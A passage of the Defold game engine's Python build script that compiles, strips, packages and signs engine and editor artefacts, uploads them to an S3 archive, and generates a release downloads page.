Android Jars (external) external_jars = ("android-support-multidex.jar", "android.jar") jardir = os.path.join(self.dynamo_home, 'ext/share/java') paths = _findjars(jardir, external_jars) self._add_files_to_zip(zip, paths, self.dynamo_home, topfolder) # Win32 resource files engine_rc = os.path.join(self.dynamo_home, 
'lib/%s/defold.ico' % platform) defold_ico = os.path.join(self.dynamo_home, 'lib/%s/engine.rc' % platform) self._add_files_to_zip(zip, [engine_rc, defold_ico], self.dynamo_home, topfolder) # JavaScript files # js-web-pre-x files jsdir = os.path.join(self.dynamo_home, 'share') paths = _findjslibs(jsdir) self._add_files_to_zip(zip, paths, self.dynamo_home, topfolder) # libraries for js-web jsdir = os.path.join(self.dynamo_home, 'lib/js-web/js/') paths = _findjslibs(jsdir) self._add_files_to_zip(zip, paths, self.dynamo_home, topfolder) # libraries for wasm-web jsdir = os.path.join(self.dynamo_home, 'lib/wasm-web/js/') paths = _findjslibs(jsdir) self._add_files_to_zip(zip, paths, self.dynamo_home, topfolder) # For logging, print all paths in zip: for x in zip.namelist(): print(x) zip.close() return outfile.name return None def build_platform_sdk(self): # Helper function to make it easier to build a platform sdk locally try: path = self._package_platform_sdk(self.target_platform) except Exception, e: print "Failed to package sdk for platform %s: %s" % (self.target_platform, e) else: print "Wrote %s" % path def build_builtins(self): with open(join(self.dynamo_home, 'share', 'builtins.zip'), 'wb') as f: self._ziptree(join(self.dynamo_home, 'content', 'builtins'), outfile = f, directory = join(self.dynamo_home, 'content')) def _strip_engine(self, path): """ Strips the debug symbols from an executable """ if self.target_platform not in ['x86_64-linux','x86_64-darwin','armv7-darwin','arm64-darwin','x86_64-ios','armv7-android','arm64-android']: return False sdkfolder = join(self.ext, 'SDKs') strip = "strip" if 'android' in self.target_platform: ANDROID_NDK_VERSION = '20' ANDROID_NDK_ROOT = os.path.join(sdkfolder,'android-ndk-r%s' % ANDROID_NDK_VERSION) ANDROID_GCC_VERSION = '4.9' if target_platform == 'armv7-android': ANDROID_PLATFORM = 'arm-linux-androideabi' elif target_platform == 'arm64-android': ANDROID_PLATFORM = 'aarch64-linux-android' ANDROID_HOST = 'linux' if sys.platform == 'linux2' else 'darwin' strip = "%s/toolchains/%s-%s/prebuilt/%s-x86_64/bin/%s-strip" % (ANDROID_NDK_ROOT, ANDROID_PLATFORM, ANDROID_GCC_VERSION, ANDROID_HOST, ANDROID_PLATFORM) if self.target_platform in ('x86_64-darwin','armv7-darwin','arm64-darwin','x86_64-ios') and 'linux2' == sys.platform: strip = os.path.join(sdkfolder, 'linux', PACKAGES_LINUX_CLANG, 'bin', 'x86_64-apple-darwin19-strip') run.shell_command("%s %s" % (strip, path)) return True def archive_engine(self): sha1 = self._git_sha1() full_archive_path = join(sha1, 'engine', self.target_platform).replace('\\', '/') share_archive_path = join(sha1, 'engine', 'share').replace('\\', '/') java_archive_path = join(sha1, 'engine', 'share', 'java').replace('\\', '/') dynamo_home = self.dynamo_home self.full_archive_path = full_archive_path bin_dir = self.build_utility.get_binary_path() lib_dir = self.target_platform # upload editor 2.0 launcher if self.target_platform in ['x86_64-linux', 'x86_64-darwin', 'x86_64-win32']: launcher_name = format_exes("launcher", self.target_platform)[0] launcherbin = join(bin_dir, launcher_name) self.upload_to_archive(launcherbin, '%s/%s' % (full_archive_path, launcher_name)) # upload gdc tool on desktop platforms if self.target_platform in ['x86_64-linux', 'x86_64-darwin', 'x86_64-win32']: gdc_name = format_exes("gdc", self.target_platform)[0] gdc_bin = join(bin_dir, gdc_name) self.upload_to_archive(gdc_bin, '%s/%s' % (full_archive_path, gdc_name)) for n in ['dmengine', 'dmengine_release', 'dmengine_headless']: for engine_name in 
format_exes(n, self.target_platform): engine = join(bin_dir, engine_name) self.upload_to_archive(engine, '%s/%s' % (full_archive_path, engine_name)) engine_stripped = join(bin_dir, engine_name + "_stripped") shutil.copy2(engine, engine_stripped) if self._strip_engine(engine_stripped): self.upload_to_archive(engine_stripped, '%s/stripped/%s' % (full_archive_path, engine_name)) if 'win32' in self.target_platform: pdb = join(bin_dir, os.path.splitext(engine_name)[0] + '.pdb') self.upload_to_archive(pdb, '%s/%s' % (full_archive_path, os.path.basename(pdb))) if 'web' in self.target_platform: engine_mem = join(bin_dir, engine_name + '.mem') if os.path.exists(engine_mem): self.upload_to_archive(engine_mem, '%s/%s.mem' % (full_archive_path, engine_name)) engine_symbols = join(bin_dir, engine_name + '.symbols') if os.path.exists(engine_symbols): self.upload_to_archive(engine_symbols, '%s/%s.symbols' % (full_archive_path, engine_name)) elif 'darwin' in self.target_platform: engine_symbols = join(bin_dir, engine_name + '.dSYM.zip') if os.path.exists(engine_symbols): self.upload_to_archive(engine_symbols, '%s/%s' % (full_archive_path, os.path.basename(engine_symbols))) zip_archs = [] if not self.skip_docs: zip_archs.append('ref-doc.zip') if not self.skip_builtins: zip_archs.append('builtins.zip') for zip_arch in zip_archs: self.upload_to_archive(join(dynamo_home, 'share', zip_arch), '%s/%s' % (share_archive_path, zip_arch)) if self.target_platform == 'x86_64-linux': # NOTE: It's arbitrary for which platform we archive dlib.jar. Currently set to linux 64-bit self.upload_to_archive(join(dynamo_home, 'share', 'java', 'dlib.jar'), '%s/dlib.jar' % (java_archive_path)) if 'android' in self.target_platform: files = [ ('share/java', 'classes.dex'), ('bin/%s' % (self.target_platform), 'dmengine.apk'), ('ext/share/java', 'android.jar'), ] for f in files: src = join(dynamo_home, f[0], f[1]) self.upload_to_archive(src, '%s/%s' % (full_archive_path, f[1])) resources = self._ziptree(join(dynamo_home, 'ext', 'share', 'java', 'res'), directory = join(dynamo_home, 'ext', 'share', 'java')) self.upload_to_archive(resources, '%s/android-resources.zip' % (full_archive_path)) if self.is_desktop_target(): libs = ['texc', 'particle'] for lib in libs: lib_name = format_lib('%s_shared' % (lib), self.target_platform) lib_path = join(dynamo_home, 'lib', lib_dir, lib_name) self.upload_to_archive(lib_path, '%s/%s' % (full_archive_path, lib_name)) sdkpath = self._package_platform_sdk(self.target_platform) self.upload_to_archive(sdkpath, '%s/defoldsdk.zip' % full_archive_path) def _get_build_flags(self): supported_tests = {} supported_tests['darwin'] = ['darwin', 'x86_64-darwin'] supported_tests['x86_64-win32'] = ['win32', 'x86_64-win32', 'arm64-nx64'] supports_tests = self.target_platform in supported_tests.get(self.host, []) or self.host == self.target_platform skip_tests = '--skip-tests' if self.skip_tests or not supports_tests else '' skip_codesign = '--skip-codesign' if self.skip_codesign else '' disable_ccache = '--disable-ccache' if self.disable_ccache else '' return {'skip_tests':skip_tests, 'skip_codesign':skip_codesign, 'disable_ccache':disable_ccache, 'prefix':None} def get_base_platforms(self): # Base platforms is the platforms to build the base libs for. # The base libs are the libs needed to build bob, i.e. contains compiler code. 
platform_dependencies = {'darwin': ['darwin', 'x86_64-darwin'], # x86_64-darwin from IOS fix 3dea8222 'x86_64-linux': [], 'x86_64-win32': ['win32']} platforms = list(platform_dependencies.get(self.host, [self.host])) if not self.host in platforms: platforms.append(self.host) return platforms def _build_engine_cmd(self, skip_tests, skip_codesign, disable_ccache, prefix): prefix = prefix and prefix or self.dynamo_home return 'python %s/ext/bin/waf --prefix=%s %s %s %s distclean configure build install' % (self.dynamo_home, prefix, skip_tests, skip_codesign, disable_ccache) def _build_engine_lib(self, args, lib, platform, skip_tests = False, dir = 'engine'): self._log('Building %s for %s' % (lib, platform)) skip_build_tests = [] if skip_tests and '--skip-build-tests' not in self.waf_options: skip_build_tests.append('--skip-tests') skip_build_tests.append('--skip-build-tests') cwd = join(self.defold_root, '%s/%s' % (dir, lib)) plf_args = ['--platform=%s' % platform] run.env_command(self._form_env(), args + plf_args + self.waf_options + skip_build_tests, cwd = cwd) def build_bob_light(self): self._log('Building bob light') cwd = join(self.defold_root, 'com.dynamo.cr/com.dynamo.cr.bob') sha1 = self._git_sha1() if os.path.exists(os.path.join(self.dynamo_home, 'archive', sha1)): run.env_shell_command(self._form_env(), "./scripts/copy.sh", cwd = cwd) env = self._form_env() ant_args = ['-logger', 'org.apache.tools.ant.listener.AnsiColorLogger'] env['ANT_OPTS'] = '-Dant.logger.defaults=%s/ant-logger-colors.txt' % join(self.defold_root, 'com.dynamo.cr/com.dynamo.cr.bob.test') run.command(" ".join([join(self.dynamo_home, 'ext/share/ant/bin/ant'), 'clean', 'install-bob-light'] + ant_args), cwd = join(self.defold_root, 'com.dynamo.cr/com.dynamo.cr.bob'), shell = True, env = env) def build_engine(self): self.check_sdk() # We want random folder to thoroughly test bob-light # We dont' want it to unpack for _every_ single invocation during the build os.environ['DM_BOB_ROOTFOLDER'] = tempfile.mkdtemp(prefix='bob-light-') self._log("env DM_BOB_ROOTFOLDER=" + os.environ['DM_BOB_ROOTFOLDER']) cmd = self._build_engine_cmd(**self._get_build_flags()) args = cmd.split() host = self.host2 if 'x86-' in host: host = self.host if host == 'darwin': host = 'x86_64-darwin' # Make sure we build these for the host platform for the toolchain (bob light) for lib in ['dlib', 'texc']: skip_tests = host != self.target_platform self._build_engine_lib(args, lib, host, skip_tests = skip_tests) if not self.skip_bob_light: # We must build bob-light, which builds content during the engine build self.build_bob_light() # Target libs to build engine_libs = list(ENGINE_LIBS) if host != self.target_platform: engine_libs.insert(0, 'dlib') if self.is_desktop_target(): engine_libs.insert(1, 'texc') for lib in engine_libs: if not build_private.is_library_supported(target_platform, lib): continue self._build_engine_lib(args, lib, target_platform) self._build_engine_lib(args, 'extender', target_platform, dir = 'share') if not self.skip_docs: self.build_docs() if not self.skip_builtins: self.build_builtins() if '--static-analyze' in self.waf_options: scan_output_dir = os.path.normpath(os.path.join(os.environ['DYNAMO_HOME'], '..', '..', 'static_analyze')) report_dir = os.path.normpath(os.path.join(os.environ['DYNAMO_HOME'], '..', '..', 'report')) run.command(['python', './scripts/scan_build_gather_report.py', '-o', report_dir, '-i', scan_output_dir]) print("Wrote report to %s. Open with 'scan-view .' 
or 'python -m SimpleHTTPServer'" % report_dir) shutil.rmtree(scan_output_dir) if os.path.exists(os.environ['DM_BOB_ROOTFOLDER']): print "Removing", os.environ['DM_BOB_ROOTFOLDER'] shutil.rmtree(os.environ['DM_BOB_ROOTFOLDER']) def build_external(self): flags = self._get_build_flags() flags['prefix'] = join(self.defold_root, 'packages') cmd = self._build_engine_cmd(**flags) args = cmd.split() + ['package'] for lib in EXTERNAL_LIBS: self._build_engine_lib(args, lib, platform=self.target_platform, dir='external') def build_go(self): exe_ext = '.exe' if 'win32' in self.target_platform else '' go = '%s/ext/go/%s/go/bin/go%s' % (self.dynamo_home, self.target_platform, exe_ext) if not os.path.exists(go): self._log("Missing go for target platform, run install_ext with --platform set.") exit(5) run.env_command(self._form_env(), [go, 'clean', '-i', 'github.com/...']) run.env_command(self._form_env(), [go, 'install', 'github.com/...']) run.env_command(self._form_env(), [go, 'clean', '-i', 'defold/...']) if not self.skip_tests: run.env_command(self._form_env(), [go, 'test', 'defold/...']) run.env_command(self._form_env(), [go, 'install', 'defold/...']) for f in glob(join(self.defold, 'go', 'bin', '*')): shutil.copy(f, join(self.dynamo_home, 'bin')) def archive_go(self): sha1 = self._git_sha1() full_archive_path = join(sha1, 'go', self.target_platform) for p in glob(join(self.defold, 'go', 'bin', '*')): self.upload_to_archive(p, '%s/%s' % (full_archive_path, basename(p))) def archive_bob(self): sha1 = self._git_sha1() full_archive_path = join(sha1, 'bob').replace('\\', '/') for p in glob(join(self.dynamo_home, 'share', 'java', 'bob.jar')): self.upload_to_archive(p, '%s/%s' % (full_archive_path, basename(p))) def copy_local_bob_artefacts(self): apkc_name = format_exes('apkc', self.host2)[0] texc_name = format_lib('texc_shared', self.host2) luajit_dir = tempfile.mkdtemp() cwd = join(self.defold_root, 'com.dynamo.cr/com.dynamo.cr.bob') missing = {} def add_missing(plf, txt): txts = [] txts = missing.setdefault(plf, txts) txts = txts.append(txt) for plf in [['x86_64-win32', 'x86_64-win32'], ['x86_64-linux', 'x86_64-linux'], ['x86_64-darwin', 'x86_64-darwin']]: luajit_path = join(cwd, '../../packages/luajit-2.1.0-beta3-%s.tar.gz' % (plf[0])) if not os.path.exists(luajit_path): add_missing(plf[1], "package '%s' could not be found" % (luajit_path)) else: self._extract(luajit_path, luajit_dir) luajit_exe = format_exes('luajit-32', plf[1])[0] luajit_exe_64 = format_exes('luajit-64', plf[1])[0] self._copy(join(luajit_dir, 'bin/%s/%s' % (plf[0], luajit_exe)), join(cwd, 'libexec/%s/%s' % (plf[1], luajit_exe))) self._copy(join(luajit_dir, 'bin/%s/%s' % (plf[0], luajit_exe_64)), join(cwd, 'libexec/%s/%s' % (plf[1], luajit_exe_64))) win32_files = dict([['ext/lib/%s/%s.dll' % (plf[0], lib), 'lib/%s/%s.dll' % (plf[1], lib)] for lib in ['OpenAL32', 'wrap_oal', 'PVRTexLib', 'msvcr120'] for plf in [['win32', 'x86-win32'], ['x86_64-win32', 'x86_64-win32']]]) osx_files = dict([['ext/lib/%s/lib%s.dylib' % (plf[0], lib), 'lib/%s/lib%s.dylib' % (plf[1], lib)] for lib in ['PVRTexLib'] for plf in [['x86_64-darwin', 'x86_64-darwin']]]) linux_files = dict([['ext/lib/%s/lib%s.so' % (plf[0], lib), 'lib/%s/lib%s.so' % (plf[1], lib)] for lib in ['PVRTexLib'] for plf in [['x86_64-linux', 'x86_64-linux']]]) js_files = {} android_files = {'ext/bin/%s/%s' % (self.host2, apkc_name): 'libexec/%s/%s' % (self.host2, apkc_name), 'share/java/classes.dex': 'lib/classes.dex', 'ext/share/java/android.jar': 'lib/android.jar'} switch_files = {} # 
This dict is being built up and will eventually be used for copying in the end # - "type" - what the files are needed for, for error reporting # - pairs of src-file -> dst-file artefacts = {'generic': {'share/java/dlib.jar': 'lib/dlib.jar', 'share/builtins.zip': 'lib/builtins.zip', 'lib/%s/%s' % (self.host2, texc_name): 'lib/%s/%s' % (self.host2, texc_name)}, 'android-bundling': android_files, 'win32-bundling': win32_files, 'js-bundling': js_files, 'ios-bundling': {}, 'osx-bundling': osx_files, 'linux-bundling': linux_files, 'switch-bundling': switch_files} # Add dmengine to 'artefacts' procedurally for type, plfs in {'android-bundling': [['armv7-android', 'armv7-android'], ['arm64-android', 'arm64-android']], 'win32-bundling': [['win32', 'x86-win32'], ['x86_64-win32', 'x86_64-win32']], 'js-bundling': [['js-web', 'js-web'], ['wasm-web', 'wasm-web']], 'ios-bundling': [['armv7-darwin', 'armv7-darwin'], ['arm64-darwin', 'arm64-darwin'], ['x86_64-ios', 'x86_64-ios']], 'osx-bundling': [['x86_64-darwin', 'x86_64-darwin']], 'linux-bundling': [['x86_64-linux', 'x86_64-linux']], 'switch-bundling': [['arm64-nx64', 'arm64-nx64']]}.iteritems(): # plfs is pairs of src-platform -> dst-platform for plf in plfs: exes = format_exes('dmengine', plf[1]) + format_exes('dmengine_release', plf[1]) artefacts[type].update(dict([['bin/%s/%s' % (plf[0], exe), 'libexec/%s/%s' % (plf[1], exe)] for exe in exes])) # Perform the actual copy, or list which files are missing for type, files in artefacts.iteritems(): m = [] for src, dst in files.iteritems(): src_path = join(self.dynamo_home, src) if not os.path.exists(src_path): m.append(src_path) else: dst_path = join(cwd, dst) self._mkdirs(os.path.dirname(dst_path)) self._copy(src_path, dst_path) if m: add_missing(type, m) if missing: print('*** NOTE! 
There are missing artefacts.') print(json.dumps(missing, indent=2)) def build_bob(self): cwd = join(self.defold_root, 'com.dynamo.cr/com.dynamo.cr.bob') sha1 = self._git_sha1() if os.path.exists(os.path.join(self.dynamo_home, 'archive', sha1)): run.env_shell_command(self._form_env(), "./scripts/copy.sh", cwd = cwd) else: self.copy_local_bob_artefacts() env = self._form_env() ant = join(self.dynamo_home, 'ext/share/ant/bin/ant') ant_args = ['-logger', 'org.apache.tools.ant.listener.AnsiColorLogger'] env['ANT_OPTS'] = '-Dant.logger.defaults=%s/ant-logger-colors.txt' % join(self.defold_root, 'com.dynamo.cr/com.dynamo.cr.bob.test') cwd = join(self.defold_root, 'com.dynamo.cr/com.dynamo.cr.bob') args = [ant, 'clean', 'install'] + ant_args run.command(" ".join(args), cwd = cwd, shell = True, env = env, stdout = None) if not self.skip_tests: cwd = join(self.defold_root, 'com.dynamo.cr/com.dynamo.cr.bob.test') args = [ant, 'test-clean', 'test'] + ant_args run.command(" ".join(args), cwd = cwd, shell = True, env = env, stdout = None) def build_sdk(self): tempdir = tempfile.mkdtemp() # where the sdk ends up sha1 = self._git_sha1() u = urlparse.urlparse(self.get_archive_path()) bucket = s3.get_bucket(u.netloc) root = urlparse.urlparse(self.get_archive_path()).path[1:] base_prefix = os.path.join(root, sha1) platforms = get_target_platforms() for platform in platforms: prefix = os.path.join(base_prefix, 'engine', platform, 'defoldsdk.zip') entry = bucket.get_key(prefix) if entry is None: raise Exception("Could not find sdk: %s" % prefix) platform_sdk_zip = tempfile.NamedTemporaryFile(delete = False) print "Downloading", entry.key entry.get_contents_to_filename(platform_sdk_zip.name) print "Downloaded", entry.key, "to", platform_sdk_zip.name self._extract_zip(platform_sdk_zip.name, tempdir) print "Extracted", platform_sdk_zip.name, "to", tempdir os.unlink(platform_sdk_zip.name) print "" treepath = os.path.join(tempdir, 'defoldsdk') sdkpath = self._ziptree(treepath, directory=tempdir) print "Packaged defold sdk" sdkurl = join(sha1, 'engine').replace('\\', '/') self.upload_to_archive(sdkpath, '%s/defoldsdk.zip' % sdkurl) def build_docs(self): skip_tests = '--skip-tests' if self.skip_tests or self.target_platform != self.host else '' self._log('Building API docs') cwd = join(self.defold_root, 'engine/docs') cmd = 'python %s/ext/bin/waf configure --prefix=%s %s distclean configure build install' % (self.dynamo_home, self.dynamo_home, skip_tests) run.env_command(self._form_env(), cmd.split() + self.waf_options, cwd = cwd) with open(join(self.dynamo_home, 'share', 'ref-doc.zip'), 'wb') as f: self._ziptree(join(self.dynamo_home, 'share', 'doc'), outfile = f, directory = join(self.dynamo_home, 'share')) # ------------------------------------------------------------ # BEGIN: EDITOR 2 # def download_editor2(self): if not self.channel: raise Exception('No channel provided when downloading the editor') editor_filename = "Defold-%s.zip" % self.target_platform editor_path = join(self.defold_root, 'editor', 'target', 'editor', editor_filename) s3_path = join(self._git_sha1(), self.channel, 'editor2', editor_filename) self.download_from_archive(s3_path, editor_path) def archive_editor2(self): if not self.channel: raise Exception('No channel provided when archiving the editor') sha1 = self._git_sha1() full_archive_path = join(sha1, self.channel, 'editor2') zip_file = "Defold-%s.zip" % self.target_platform dmg_file = "Defold-%s.dmg" % self.target_platform zip_path = join(self.defold_root, 'editor', 'target', 'editor', 
zip_file) dmg_path = join(self.defold_root, 'editor', 'target', 'editor', dmg_file) if os.path.exists(zip_path): self.upload_to_archive(zip_path, '%s/%s' % (full_archive_path, zip_file)) if os.path.exists(dmg_path): self.upload_to_archive(dmg_path, '%s/%s' % (full_archive_path, dmg_file)) self.wait_uploads() def run_editor_script(self, cmd): cwd = join(self.defold_root, 'editor') run.env_command(self._form_env(), cmd, cwd = cwd) def build_editor2(self): cmd = ['python', './scripts/bundle.py', '--engine-artifacts=%s' % self.engine_artifacts, 'build'] if self.skip_tests: cmd.append("--skip-tests") self.run_editor_script(cmd) def bundle_editor2(self): if not self.channel: raise Exception('No channel provided when bundling the editor') cmd = ['python', './scripts/bundle.py', '--platform=%s' % self.target_platform, '--version=%s' % self.version, '--channel=%s' % self.channel, '--engine-artifacts=%s' % self.engine_artifacts, 'bundle'] self.run_editor_script(cmd) def sign_editor2(self): editor_bundle_dir = join(self.defold_root, 'editor', 'target', 'editor') cmd = ['python', './scripts/bundle.py', '--platform=%s' % self.target_platform, '--bundle-dir=%s' % editor_bundle_dir, 'sign'] if self.skip_codesign: cmd.append('--skip-codesign') else: if self.windows_cert: cmd.append('--windows-cert=%s' % self.windows_cert) if self.windows_cert_pass: cmd.append("--windows-cert-pass=%s" % self.windows_cert_pass) if self.codesigning_identity: cmd.append('--codesigning-identity="%s"' % self.codesigning_identity) self.run_editor_script(cmd) def notarize_editor2(self): if self.target_platform != "x86_64-darwin": return editor_bundle_dir = join(self.defold_root, 'editor', 'target', 'editor') # create dmg installer cmd = ['./scripts/bundle.py', '--platform=x86_64-darwin', '--bundle-dir=%s' % editor_bundle_dir, 'installer'] if self.skip_codesign: cmd.append('--skip-codesign') else: if self.codesigning_identity: cmd.append('--codesigning-identity="%s"' % self.codesigning_identity) self.run_editor_script(cmd) # notarize dmg editor_dmg = join(editor_bundle_dir, 'Defold-x86_64-darwin.dmg') cmd = ['./scripts/notarize.py', editor_dmg, self.notarization_username, self.notarization_password, self.notarization_itc_provider] self.run_editor_script(cmd) # # END: EDITOR 2 # ------------------------------------------------------------ def bump(self): sha1 = self._git_sha1() with open('VERSION', 'r') as f: current = f.readlines()[0].strip() if self.set_version: new_version = self.set_version else: lst = map(int, current.split('.')) lst[-1] += 1 new_version = '.'.join(map(str, lst)) with open('VERSION', 'w') as f: f.write(new_version) print 'Bumping engine version from %s to %s' % (current, new_version) print 'Review changes and commit' def save_env(self): if not self.save_env_path: self._log("No --save-env-path set when trying to save environment export") return env = self._form_env() res = "" for key in env: if bool(re.match('^[a-zA-Z0-9_]+$', key)): res = res + ("export %s='%s'\n" % (key, env[key])) with open(self.save_env_path, "w") as f: f.write(res) def shell(self): print 'Setting up shell with DYNAMO_HOME, PATH, ANDROID_HOME and LD_LIBRARY_PATH/DYLD_LIBRARY_PATH (where applicable) set' if "win32" in self.host: preexec_fn = None else: preexec_fn = self.check_ems process = subprocess.Popen([SHELL, '-l'], env = self._form_env(), preexec_fn=preexec_fn) output = process.communicate()[0] if process.returncode != 0: self._log(output) sys.exit(process.returncode) # ------------------------------------------------------------ # 
BEGIN: RELEASE # def release(self): page = """ <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Defold Downloads</title> <link href='//fonts.googleapis.com/css?family=Open+Sans:400,300' rel='stylesheet' type='text/css'> <link rel="stylesheet" href="//d.defold.com/static/bootstrap/css/bootstrap.min.css"> <style> body { padding-top: 50px; } .starter-template { padding: 40px 15px; text-align: center; } </style> </head> <body> <div class="navbar navbar-fixed-top"> <div class="navbar-inner"> <div class="container"> <a class="brand" href="/">Defold Downloads</a> <ul class="nav"> </ul> </div> </div> </div> <div class="container"> <div id="releases"></div> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.11.0/jquery.min.js"></script> <script src="//d.defold.com/static/bootstrap/js/bootstrap.min.js"></script> <script src="//cdnjs.cloudflare.com/ajax/libs/mustache.js/0.7.2/mustache.min.js"></script> <script id="templ-releases" type="text/html"> <h2>{{release.channel}} {{release.version}}</h2> {{#release.editor}} <p> <a href="{{url}}" class="btn btn-primary" style="width: 20em;" role="button">Download for {{name}}</a> </p> {{/release.editor}} {{#has_releases}} <h2>Releases</h2> {{/has_releases}} {{#releases}} <div class="panel-group" id="accordion"> <div class="panel panel-default"> <div class="panel-heading"> <h4 class="panel-title"> <a data-toggle="collapse" data-parent="#accordion" href="#{{sha1}}"> <h3>{{tag}} <small>{{date}} ({{abbrevsha1}})</small></h3> </a> </h4> </div> <div id="{{sha1}}" class="panel-collapse collapse "> <div class="panel-body"> <table class="table table-striped"> <tbody> {{#files}} <tr><td><a href="{{path}}">{{name}}</a></td></tr> {{/files}} {{^files}} <i>No files</i> {{/files}} </tbody> </table> </div> </div> </div> </div> {{/releases}} </script> <script> var model = %(model)s var output = Mustache.render($('#templ-releases').html(), model); $("#releases").html(output); </script> </body> </html> """ if run.shell_command('git config -l').find('remote.origin.url') != -1 and os.environ.get('GITHUB_WORKFLOW', None) is None: # NOTE: Only run fetch when we have a configured remote branch. # When running on buildbot we don't but fetching should not be required either # as we're already up-to-date self._log('Running git fetch to get latest tags and refs...') run.shell_command('git fetch') u = urlparse.urlparse(self.get_archive_path()) hostname = u.hostname bucket = s3.get_bucket(hostname) model = {'releases': [], 'has_releases': False} if self.channel == 'stable': # Move artifacts to a separate page? model['releases'] = s3.get_tagged_releases(self.get_archive_path()) model['has_releases'] = True else: model['releases'] = s3.get_single_release(self.get_archive_path(), self.version, self._git_sha1()) model['has_releases'] = True if not model['releases']: raise Exception('Unable to find any releases') # NOTE # - The stable channel is based on the latest tag # - The beta and alpha channels are based on the latest # commit in their branches, i.e. origin/dev for alpha if self.channel == 'stable': release_sha1 = model['releases'][0]['sha1'] else: release_sha1 = self._git_sha1() if sys.stdin.isatty(): sys.stdout.write('Release %s with SHA1 %s to channel %s? 
[y/n]: ' % (self.version, release_sha1, self.channel)) response = sys.stdin.readline() if response[0] != 'y': return model['release'] = { 'channel': "Unknown", 'version': self.version } if self.channel: model['release']['channel'] = self.channel.capitalize() # We handle the stable channel seperately, since we want it to point # to the editor-dev release (which uses the latest stable engine). editor_channel = None if self.channel == "stable": editor_channel = "editor-alpha" else: editor_channel = self.channel or "stable" editor_archive_path = urlparse.urlparse(self.get_archive_path(editor_channel)).path editor_download_url = "https://%s%s/%s/%s/editor2/" % (hostname, editor_archive_path, release_sha1, editor_channel) model['release'] = {'editor': [ dict(name='macOS 10.11+', url=editor_download_url + 'Defold-x86_64-darwin.dmg'), dict(name='macOS 10.7-10.10', url=editor_download_url + 'Defold-x86_64-darwin.zip'), dict(name='Windows', url=editor_download_url + 'Defold-x86_64-win32.zip'), dict(name='Ubuntu 16.04+', url=editor_download_url + 'Defold-x86_64-linux.zip')] } # NOTE: We upload index.html to /CHANNEL/index.html # The root-index, /index.html, redirects to /stable/index.html self._log('Uploading %s/index.html' % self.channel) html = page % {'model': json.dumps(model)} key = bucket.new_key('%s/index.html' % self.channel) key.content_type = 'text/html' key.set_contents_from_string(html) self._log('Uploading %s/info.json' % self.channel) key = bucket.new_key('%s/info.json' % self.channel) key.content_type = 'application/json' key.set_contents_from_string(json.dumps({'version': self.version, 'sha1' : release_sha1})) # Editor update-v3.json key_v3 = bucket.new_key('editor2/channels/%s/update-v3.json' % self.channel) key_v3.content_type = 'application/json' self._log("Updating channel '%s' for update-v3.json: %s" % (self.channel, key_v3)) key_v3.set_contents_from_string(json.dumps({'sha1': release_sha1})) # Set redirect urls so the editor can always be downloaded without knowing the latest sha1. 
# Used by www.defold.com/download # For example; # redirect: /editor2/channels/editor-alpha/Defold-x86_64-darwin.dmg -> /archive/<sha1>/editor-alpha/Defold-x86_64-darwin.dmg for name in ['Defold-x86_64-darwin.dmg', 'Defold-x86_64-win32.zip', 'Defold-x86_64-linux.zip']: key_name = 'editor2/channels/%s/%s' % (editor_channel, name) redirect = '%s/%s/%s/editor2/%s' % (editor_archive_path, release_sha1, editor_channel, name) self._log('Creating link from %s -> %s' % (key_name, redirect)) key = bucket.new_key(key_name) key.set_redirect(redirect) # # END: RELEASE # ------------------------------------------------------------ def release_to_github(self): release_to_github.release(self) def release_to_github_markdown(self): release_to_github.release_markdown(self) def sync_archive(self): u = urlparse.urlparse(self.get_archive_path()) bucket_name = u.hostname bucket = s3.get_bucket(bucket_name) local_dir = os.path.join(self.dynamo_home, 'archive') self._mkdirs(local_dir) if not self.thread_pool: self.thread_pool = ThreadPool(8) def download(key, path): self._log('s3://%s/%s -> %s' % (bucket_name, key.name, path)) key.get_contents_to_filename(path) futures = [] sha1 = self._git_sha1() # Only s3 is supported (scp is deprecated) # The pattern is used to filter out: # * Editor files # * Defold SDK files # * launcher files, used to launch editor2 pattern = re.compile(r'(^|/)editor(2)*/|/defoldsdk\.zip$|/launcher(\.exe)*$') prefix = s3.get_archive_prefix(self.get_archive_path(), self._git_sha1()) for key in bucket.list(prefix = prefix): rel = os.path.relpath(key.name, prefix) if not pattern.search(rel): p = os.path.join(local_dir, sha1, rel) self._mkdirs(os.path.dirname(p)) f = Future(self.thread_pool, download, key, p) futures.append(f) for f in futures: f() # ------------------------------------------------------------ # BEGIN: SMOKE TEST # def _download_editor2(self, channel, sha1): bundles = { 'x86_64-darwin': 'Defold-x86_64-darwin.dmg', 'x86_64-linux' : 'Defold-x86_64-linux.zip', 'x86_64-win32' : 'Defold-x86_64-win32.zip' } host2 = get_host_platform2() bundle = bundles.get(host2) if bundle: url = join(self.get_archive_path(), sha1, channel, 'editor2', bundle).replace("s3", "https").replace("\\", "/") path = self._download(url) return path else: print("No editor2 bundle found for %s" % host2) return None def _install_editor2(self, path): host2 = get_host_platform2() install_path = join('tmp', 'smoke_test') if 'darwin' in host2: out = run.command(['hdiutil', 'attach', path]) print("cmd:" + out) last = [l2 for l2 in (l1.strip() for l1 in out.split('\n')) if l2][-1] words = last.split() fs = words[0] volume = words[-1] install_path = join(install_path, 'Defold.app') self._copy_tree(join(volume, 'Defold.app'), install_path) result = {'volume': volume, 'fs': fs, 'install_path': install_path, 'resources_path': join('Defold.app', 'Contents', 'Resources'), 'config': join(install_path, 'Contents', 'Resources', 'config')} return result else: if 'win32' in host2 or 'linux' in host2: self._extract_zip(path, install_path) else: self._extract(path, install_path) install_path = join(install_path, 'Defold') result = {'install_path': install_path, 'resources_path': 'Defold', 'config': join(install_path, 'config')} return result def _uninstall_editor2(self, info): host2 = get_host_platform2() shutil.rmtree(info['install_path']) if 'darwin' in host2: out = run.command(['hdiutil', 'detach', info['fs']]) def _get_config(self, config, section, option, overrides): combined = '%s.%s' % (section, option) if combined in 
